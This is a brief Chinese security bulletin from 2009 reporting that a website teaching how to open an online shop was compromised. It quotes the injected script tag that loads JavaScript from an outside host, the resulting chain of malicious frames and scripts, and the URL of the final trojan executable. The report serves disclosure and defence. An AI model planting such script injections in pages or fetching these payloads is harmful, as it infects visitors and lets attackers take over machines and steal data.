如何开网店被植入恶意代码

来源:岁月联盟 编辑:zhuzhu 时间:2009-04-25
如何开网店(http://www.51kaiwangdian.cn/)被植入恶意代码。用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。MalUrl:http://www.51kaiwangdian.cn/网页被嵌入恶 ...如何开网店(http://www.51kaiwangdian.cn/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.51kaiwangdian.cn/

网页被嵌入恶意链接代码:

090424snap4.jpg

<script src=http://jiuqusee.8866.org/ye.js></script>
挂马分析:
[wide]http://www.51kaiwangdian.cn/
 [script]http://jiuqusee.8866.org/ye.js
  [frame]http://ijn22.rfvv0080.cn/zxx001.htm?02
   [frame]http://ijn22.rfvv0080.cn/14.htm
   [frame]http://ijn22.rfvv0080.cn/flash.htm
   [frame]http://ijn22.rfvv0080.cn/xx.htm
   [frame]http://ijn22.rfvv0080.cn/office.htm
   [frame]http://ijn22.rfvv0080.cn/02.htm
   [script]http://ijn22.rfvv0080.cn/reee.js
   [script]http://ijn22.rfvv0080.cn/rkkk.js
   [script]http://js.tongji.cn.yahoo.com/1065774/ystat.js
 [script]http://www.51kaiwangdian.cn//include/dedeajax2.js
 [cab]http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

最终下载病毒文件:
http://ijn22.rfvv0080.cn/sk9.exe

通过执行以上病毒文件,来达到完全控制访问者的系统。

关键字:恶意代码